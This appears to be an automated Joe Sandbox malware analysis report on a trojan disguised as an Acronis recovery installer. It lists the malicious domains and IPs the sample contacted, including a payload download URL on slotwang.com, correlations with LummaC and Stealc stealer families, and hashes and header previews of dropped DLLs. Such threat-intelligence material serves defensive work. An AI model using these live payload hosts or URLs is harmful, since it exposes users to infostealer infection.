https://www.entrust.net/rpa0 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | false | high
http://repository.certum.pl/ctsca2021.cer0A | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | high
http://crl.certum.pl/ctsca2021.crl0o | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | high
http://ocsp.vikingcloud.com/0A | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2039631031.00000000048CB000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
http://ocsp.entrust.net03 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | false | high
http://ocsp.entrust.net02 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmp | false | high
http://certs.securetrust.com/issuers/TWGCA.crt0 | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
http://ocsp.vikingcloud.com/0: | Palestine.com, 00000011.00000003.1992606677.00000000048C9000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000002.2032778211.0000000001D37000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.00000000042E3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.000000000430D000.00000004.00000800.00020000.00000000.sdmp | false | high
https://slotwang.com:443/file/Panorado.exe | Palestine.com, 0000001F.00000002.2370163430.000000000146C000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://contoso.com/License | powershell.exe, 00000021.00000002.2333308097.000000000609E000.00000004.00000800.00020000.00000000.sdmp | false | high
http://schemas.xmlsoap.org/soap/envelope/ | msn.exe, 00000027.00000002.2190711848.0000000027501000.00000020.00000001.01000000.00000011.sdmp; msn.exe, 00000027.00000000.2039352969.0000000000401000.00000020.00000001.01000000.0000000E.sdmp | false | high
https://slotwang.com/ | Palestine.com, 00000011.00000002.2032778211.0000000001D67000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1993781956.0000000001D67000.00000004.00000020.00020000.00000000.sdmp; Palestine.com, 0000001F.00000002.2399867318.0000000004307000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://github.com/Pester/Pesterd | powershell.exe, 00000021.00000002.2261102876.000000000519E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://aka.ms/pscore6 | powershell.exe, 00000021.00000002.2261102876.0000000005041000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp; Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmp | false | high
http://repository.certum.pl/cevcsca2021.cer0 | V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000089F6000.00000004.00001000.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.129.49 | shearhoaxx.click | United States | 13335 | CLOUDFLARENETUS | true
172.67.182.135 | kliplorihoe0.shop | United States | 13335 | CLOUDFLARENETUS | false
45.66.248.134 | slotwang.com | Russian Federation | 53356 | FREERANGECLOUDCA | false
104.21.35.89 | kliptedehoa.shop | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579835
Start date and time: 2024-12-23 10:34:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 21s
Hypervisor-based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 73
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: acronis recovery expert deluxe 1.0.0.132.rarl.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@108/207@6/4
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: acronis recovery expert deluxe 1.0.0.132.rarl.exe
Time | Type | Description
04:35:06 | API Interceptor | 2x Sleep call for process: acronis recovery expert deluxe 1.0.0.132.rarl.exe modified
04:35:30 | API Interceptor | 19x Sleep call for process: Palestine.com modified
04:35:51 | API Interceptor | 44x Sleep call for process: powershell.exe modified
04:36:35 | API Interceptor | 1x Sleep call for process: 5RLYIRN4B2NNKHJ11UTSZ2.tmp modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.129.49 | https://uspslkj.top | malicious | Unknown
172.67.129.49 | http://uspslkj.top | malicious | Unknown
172.67.182.135 | BDxsBr8Dce.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context
kliplorihoe0.shop | BDxsBr8Dce.exe | malicious | LummaC | 172.67.182.135
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | rTTSWIFTCOPIES.exe | malicious | MassLogger RAT | 172.67.177.134
CLOUDFLARENETUS | https://www.google.com.au/url?q=//www.google.co.nz/amp/s/synthchromal.ru/Vc51/ | malicious | Unknown | 172.67.154.63
CLOUDFLARENETUS | https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bv | malicious | Unknown | 104.21.92.223
CLOUDFLARENETUS | FBmz85HS0d.exe | malicious | LummaC | 172.67.150.173
CLOUDFLARENETUS | armv5l.elf | malicious | Unknown | 1.8.230.191
CLOUDFLARENETUS | BJQizQ6sqT.exe | malicious | LummaC | 172.67.150.173
CLOUDFLARENETUS | Ref#20203216.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | LNn56KMkEE.exe | malicious | LummaC | 104.21.66.86
CLOUDFLARENETUS | BVGvbpplT8.exe | malicious | LummaC, Stealc | 104.21.66.86
CLOUDFLARENETUS | FBVmDbz2nb.exe | malicious | LummaC, Stealc | 104.21.32.96
FREERANGECLOUDCA | vQu0zndLpi.dll | malicious | Unknown | 45.66.248.99
FREERANGECLOUDCA | vQu0zndLpi.dll | malicious | Unknown | 45.66.248.99
FREERANGECLOUDCA | jklarm5.elf | malicious | Unknown | 216.24.208.32
FREERANGECLOUDCA | Jaws.exe | malicious | Stealc | 45.66.248.237
FREERANGECLOUDCA | Setup-Pro.exe | malicious | Stealc, Vidar | 45.66.249.162
FREERANGECLOUDCA | forest.exe | malicious | Unknown | 45.66.249.249
FREERANGECLOUDCA | forest.exe | malicious | Unknown | 45.66.249.249
FREERANGECLOUDCA | arm.elf | malicious | Mirai, Moobot | 23.129.35.4
FREERANGECLOUDCA | SecuriteInfo.com.Trojan.PWS.Siggen3.33653.31886.3628.exe | malicious | Raccoon Stealer v2 | 193.142.147.59
FREERANGECLOUDCA | SecuriteInfo.com.Trojan.PackedNET.2334.3801.19434.exe | malicious | PureLog Stealer, Raccoon Stealer v2, SmokeLoader | 193.142.147.59
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown
• 104.21.35.89
Ref#20203216.exe | malicious | AgentTesla
• 104.21.35.89
YYjRtxS70h.exe | malicious | Unknown
• 104.21.35.89
YYjRtxS70h.exe | malicious | Unknown
• 104.21.35.89
nTyPEbq9wQ.lnk | malicious | Unknown
• 104.21.35.89
7A2lfjTYNf.lnk | malicious | Unknown
• 104.21.35.89
6fW0guYpsH.lnk | malicious | Unknown
• 104.21.35.89
FzmtNV0vnG.lnk | malicious | Unknown
• 104.21.35.89
lKin1m7Pf2.lnk | malicious | Unknown
• 104.21.35.89
uLkHEqZ3u3.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, Stealc, Vidar
• 104.21.35.89

Match: a0e9f5d64349fb13191bc781f81f42e1
FBmz85HS0d.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
BJQizQ6sqT.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
2ZsJ2iP8Q2.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
LopCYSStr3.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
LNn56KMkEE.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
VBHyEN96Pw.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
BVGvbpplT8.exe | malicious | LummaC, Stealc
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
613vKYuY2S.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
FBVmDbz2nb.exe | malicious | LummaC, Stealc
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134
mgEXk8ip26.exe | malicious | LummaC
• 172.67.129.49
• 172.67.182.135
• 45.66.248.134

No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 395080
Entropy (8bit): 6.34305438457727
Encrypted: false
SSDEEP: 6144:pnjWnHuPir9TyRyTa0EQKiq67fh+vCfd0in/zSl9cxxUTAuEF+wIso:pKOPtmD7KiqghpT/zSlkUTwMso
MD5: CB99BBDEA56A7E08C8B475BCECD5DF41
SHA1: 5C9EB462054C8242B2A9F69B3E5D27C6A1DAA0F6
SHA-256: 8ED926351E3C5ACFFFD5D3890B17D5D96990B7CCBDFC4E549DF46EF963D52F88
SHA-512: 829E7B7E6CCE4CF6B50438E451F4BBF3EABFE827C641FB2BEF3808609267AA79DCDB987A569EE71B85A702953FA7861BB6B7E00F07EFD18829391F32574DC4D9
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 1067235
Entropy (8bit): 5.605030856595753
Encrypted: false
SSDEEP: 12288:TP8SI6iUWI99Wj9FrMCbdR/1MtPU0FCdGv9Jjg/eQWSF2:g8oj9F1bXOm0F3J2eQWB
MD5: ABE709E373ABA84C8D50C15D9F1B4816
SHA1: 224BBBED25B4F93FDFF25344448CFD1823367C54
SHA-256: E1CF3B8C94E022746799BF2F20EF483F921AFDBC0BA0B821E9E8C1C9AE90A6CD
SHA-512: 46186441537364189544AE78BAC6C811BF39A441224D9C59E2D320567509F54F4219597EC783FDFDAE82A162A53EE185C33DC9E24606C411DDB484A1E24D3BDD
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 297112
Entropy (8bit): 5.58434988318072
Encrypted: false
SSDEEP: 3072:0cp5f+B3KnpVLUHXbvkTQmbUcU8CMnX4i44w12AcMP2YWxLYlJrDMDSdszcoeYlt:0cYKnkStbU6CMX4i44wcYzMOdspscwsD
MD5: 8447633EC5C303BA74898E607D95C335
SHA1: 4DD507451FC4C1A064219E758EC20D4764BBB0C9
SHA-256: E2D5CE2794A23A9CBEEA566697E850F373926BEA362E6BAF68721B380CADD146
SHA-512: 31C73E47B513E0AD84B292DD58E386D5A53D30B579AE33F15702CEB8835C28057B05AD4A164E293A4AD72F59E3658DAFD2E917A63E91C98E0B059493CFED1EC3
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... b.........."!.....J...........i... ........... ....................................@..................................h..W....................T...4.......................................................... ............... ..H............text...$I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B.................i......H...........8...................P ........................................<....~.r.,..d.e4.J.4...l.d.P..6ZC..]C.wG.P.....0t...7...I.$.p;.!.,):I...I.......`.r.(I'.....a..PI....O....<P=.D2.H.X.b.b....0...........%(.....}......}....*....0...........{....*..0...........{....*..0...........s....}.....s....}.....(....*....0..V....... ...P.........Hh....E.........E....+.....E............]...[...............3........o4.....o4.....{.......o....& ...L..........Hh...+..{.......o....,
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1429152
                                                                                                                                                                                                                                        Entropy (8bit):5.8245762450313165
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:fvfWuv6hzTA8HjSQv/e2KA2qBHYH1W2WeV:3fWuyLjSh2KNqA
                                                                                                                                                                                                                                        MD5:0B651954AC446A3465A005E0E02E75DF
                                                                                                                                                                                                                                        SHA1:B9FB9ED163AF67EA36EB85A5B40D414E0491C6EA
                                                                                                                                                                                                                                        SHA-256:A05E783FB79C5957AF9E6BB242AC0275E20210F5DF559779817838C389627213
                                                                                                                                                                                                                                        SHA-512:BF10D3FF2A38D9A7C6B7E6CC31ABEC19625221E444F8DC05DD30BAEA66726E48548516C26BF2A27C7EC0981A7101438854A47EC91113AF75E8069084BEA7BEDD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^..S...........!..................... .........\. ...............................Z....@.....................................[........................>........................................................... ............... ..H............text...@.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H...........h............`...E...`......................................*.o.....&.*....*J.,..(...+-...*.*.*....*F..o.....&..}....*.."..{....*...&...o....*..*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.F..o.....&..}....*.."..{....*...*..o.....&*.*..o.....&*.F..o.....&..}....*.."..{....*...F..o.....&..}....*.."..{....*...&...o....*..*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.*..o.....&*.F..o.....&..}....*.."..{
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):256264
                                                                                                                                                                                                                                        Entropy (8bit):6.280743592111476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:lgorgmIapjyPlLhzJ8LSyL6dMPv8i2WxTtzGLQ2dtkxj51L3KOW0I9J:CoapHJeSyQmc29GUJL3e0o
                                                                                                                                                                                                                                        MD5:96CD53799793171F96BC702948A229F0
                                                                                                                                                                                                                                        SHA1:44BAC56D294457395606D73781D2076DD0DD7C2E
                                                                                                                                                                                                                                        SHA-256:458CD882687FA33DF36ED423606C5422C903C39339D5AC708A82D2E3E2AC21C9
                                                                                                                                                                                                                                        SHA-512:D063C0E823FAA14E30FD99FE0A6C55570BC61E9B9DE2B64CB38C3929E245FE9FC025EB04A08C6B29F3D49CFE13E247D2CCD668CB2B4D7E5F18C7D7B2C5DF0E2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....P...`.......................................................y....`...@......@............... .......................................Q..T........)..........`...p...............................................................H............text....C.......P.................. ..`.data...<D...`...P...`..............@....reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1323928
                                                                                                                                                                                                                                        Entropy (8bit):5.950179732784466
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:c4WRD0inB6NRrUuiHYWB2BpVGF7m4a1i2Op0afPzFaO81NIs/CzI6zJM7Fye+:c42B8rUrUFafrFaO81Gs/Czvu7m
                                                                                                                                                                                                                                        MD5:47235912034DC9DC0232FD27B39C0A22
                                                                                                                                                                                                                                        SHA1:BE979F5419A74BA06B920C3BF42E02E14B0DBAF7
                                                                                                                                                                                                                                        SHA-256:C72D3AC3425708AF23E19BAE5CBA2699F7D2B3C0E3766CCCD33055654B831D36
                                                                                                                                                                                                                                        SHA-512:D76BFA185D7736F4D06B5CF2FA90FC7A18D7672F58D7D620CCDEFAA545649734055C7B3BE592D06E3FD6CA14D526533171E829ECDAEE0E4382C910F6554FC918
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..d.........." ..0..............!... ...@....... ...............................j....`.................................<!..O....@...................'...`....... ............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p!......H.......|^.............l.................................................{P...*..{Q...*V.(R.....}P.....}Q...*...0..A........u9.......4.,/(S....{P....{P...oT...,.(U....{Q....{Q...oV...*.*.*. .%.. )UU.Z(S....{P...oW...X )UU.Z(U....{Q...oX...X*...0..b........r...p......%..{P......%q<....<...-.&.+...<...oY....%..{Q......%q=....=...-.&.+...=...oY....(Z...*>. 4......([...*2......o\...*:........o]...*...0..,........o^...rK..p $...........%...%....o_...t....*&...o`...*..(a...*..(R..
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):205752
                                                                                                                                                                                                                                        Entropy (8bit):6.199061757291875
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:qtlJdqEGUGr4Hyt0GpD6EUObTxghpbPvdVbtZo8ntePgrD2BVyIOJ6MhnYHeTnth:2EnrnU+grD+OJ/YEt
                                                                                                                                                                                                                                        MD5:F6B40659D575D961EA2E4B0E78BC39A7
                                                                                                                                                                                                                                        SHA1:71E4A97AF6C7716517F96E8E2837EC704FA8C008
                                                                                                                                                                                                                                        SHA-256:0BA7CABA0CD30555CFF1CC01ACC4E92DE4E1B076A321A00A5476105EB5C91DB1
                                                                                                                                                                                                                                        SHA-512:160DB9DA038565337B3FF68C59550AB7DC3F3AD72B0A924E231BA5DF7ACFE85EE630F30D5AA9D00EB0F44A250017F761337EF9908A4B9A89EF5429FFDB8D8420
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^g..........." ..0.................. ... ....... .......................`.......&....`.................................e...O.... ...................%...@......|...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......|~...............x................................................("...*^.("..........%...}....*:.(".....}....*:.(".....}....*:.(".....}....*V!....9....s#........*..0../........-.r...ps$...z..~%.....(&.....('.......((.....*..........&.......0..I........()...,.(*.......(+...-...(,...(-...r...p.rU..p..(.......r_..p(/...(0...*....0..7........r...p(.....r...p(.....r...p(......(....s1.......(....*..r...p(.....r...p(......(.....(....*.0...........r...p(..............(....~.
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):227592
                                                                                                                                                                                                                                        Entropy (8bit):6.190804167760831
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:7mRuZ5I5VgaP/ltP+NEPNqEHIzNN/moz2q+:7mRuAVLltP+NEPNqEZoz2q+
                                                                                                                                                                                                                                        MD5:F41325BBE09B50707A1622B1DF104714
                                                                                                                                                                                                                                        SHA1:A7F1F9B73488A44BE792614A2D3EDB8D72B2BBD8
                                                                                                                                                                                                                                        SHA-256:E70CF1285E3E6E6E3ED01AEB9401D9D78FB3DA71FE227346C36D2970F01D2B78
                                                                                                                                                                                                                                        SHA-512:6EB4EF407D63829233982C8D1B69CE747DB8D83F1BDD9CAA7F705B4B1D47ED42603B518D98D5DB1D2DA99501E617CF1A19FA1BB61871028B26500B27F4E64C25
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....]..........." .........P...............................................P............`...@......@............... ......................................PC..<....P...)...@..t....!..p...............................................................H............text............................... ..`.data....7.......@..................@....reloc..t....@.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513920
                                                                                                                                                                                                                                        Entropy (8bit):5.3632508317482985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:sjz2PMcNu2vUaiOlBVVyx1e1y7rT/sq0HYGR/UuFZ8pN:uz6McNu2ZyxqMeUMZm
                                                                                                                                                                                                                                        MD5:9A1AD8C3023D6D56B685C9694E2068E9
                                                                                                                                                                                                                                        SHA1:B7206276DFF39CA22783F93EDB5A9845B18624B3
                                                                                                                                                                                                                                        SHA-256:309F0D97E7DA133CE823502D206C38D5157390271972CD5F8D57F013F0B8F2D4
                                                                                                                                                                                                                                        SHA-512:E242BBB69B663A3635F63335786F1949DC4CEA95C4BA8C553F30C620314432770DDD39979B20AE404DC08A23CE02BE4E78C517EC445AE488F68D8ACD49B86D01
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....@.K...........!..................... ....@...... ..............................#.....@...@......@............... ..................................0........................................................................................... ..H............text...[.... ...................... ..`.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):398864
Entropy (8bit):5.51156015007889
Encrypted:false
SSDEEP:3072:ySfv+wTSken0nWB59czSncdAegFuHljzKiRaaFaoGOC42noGAnu17T1NK6zvM4:3Tb4UeYDguIR/4FqvzT
MD5:08626AAB9A3A1C692C5B76923F3F1E22
SHA1:68FBE3A1C149A7C17857992DEF5BD99F4B052900
SHA-256:7D772FB9320E8B501DD1CF0C516BF1240EB63968C37E2B1B1613868DFF81EC2C
SHA-512:ABC08DA3F4234F168B3A0BF8F90B2350C78732D47E75DE127D20A8E0509E8C3D9F5048E835D8521E940C242A3019CE59BE0DB1FDBCAFC42E7BB54BE39DCDFD5E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):193472
Entropy (8bit):5.4874848041772095
Encrypted:false
SSDEEP:3072:/bDyi460TRX9vRrBDd5j4XAgABjXug020wHvunrrM4NeZ:/bQX9vRrBDj4++120wHvunrrw
MD5:AC66E3EFF7C87B2B24AA23E94462CB2E
SHA1:CEF579C4F0F8405CD275EEEA7975585C145293C2
SHA-256:25AD25B28E2EB4BFD30FDE01BCC294AC92676902E5FE2029F32BB791964E278B
SHA-512:6623BF3F303C7CB6412274DFC9E3FFC7378C8D4B9DBB0985D71E685663CCE3AB1B289C6184A8B245B4D88865B7005E3A80D3C2AB31A9E15C5241E8E945102CA5
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):491520
Entropy (8bit):5.77060916917561
Encrypted:false
SSDEEP:6144:z4JIBnq7m6jvftg0AC7uJn3Gaqtz4xmrk5afooH9cpXEporiIhlF/j:z4JmnpmK0D7CkKaQoSMYiI1/j
MD5:EB71D8BA2569188C1A57519392C7B68A
SHA1:FF74C81649CC6FF602660B2773307BB879A795A4
SHA-256:11BB9D7332FB5361C4AC7F6612873BC94DA2C3ACF48D8A93D8179D73FA0E707E
SHA-512:2582D2155C1D9AF23CF2E94D442EBA1FB3F6A61E461B9728AF48DFB62261E7E0FCF2B9AA05E7A80B4F5E72243EC357F7F36530BB9F5B3AE9F020291C1546845A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
Category:dropped
Size (bytes):283912
Entropy (8bit):6.097359888196017
Encrypted:false
SSDEEP:3072:YaBwDjA4dLMc/fyOyFmIH18IKtg1O5i7dmSd9xc0lRo5ijDQaYllgjJ2yco2Ry:3+bv3mFDHr6vi7+5cYl2lU0
MD5:6A26FFA6B8B706ACEA4B1C9C4CF4832E
SHA1:AE06826BE7FA70FE206D04F049035544CB5F2D62
SHA-256:13C21CE90CC6A468AB855CE0555D7429CFEA23993363897AC04762BABB197E69
SHA-512:622ACD83C016096B91A279E1735D907E239008BC26B531BF0742261E38E43A960BA74C9714C64C9344E8E7A45E47BA77295793977A4772363A0DF467BCBA75A1
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):258048
Entropy (8bit):6.552006124201261
Encrypted:false
SSDEEP:6144:U7zABjizb7DKKaZy8saNNUKCEpHIqLAMZYXR208z4zLST:U7UBmP7+3IarUKRpoqLAMmsxzmLM
MD5:2CEA1DF29F8B11A3278BE6F43D884C60
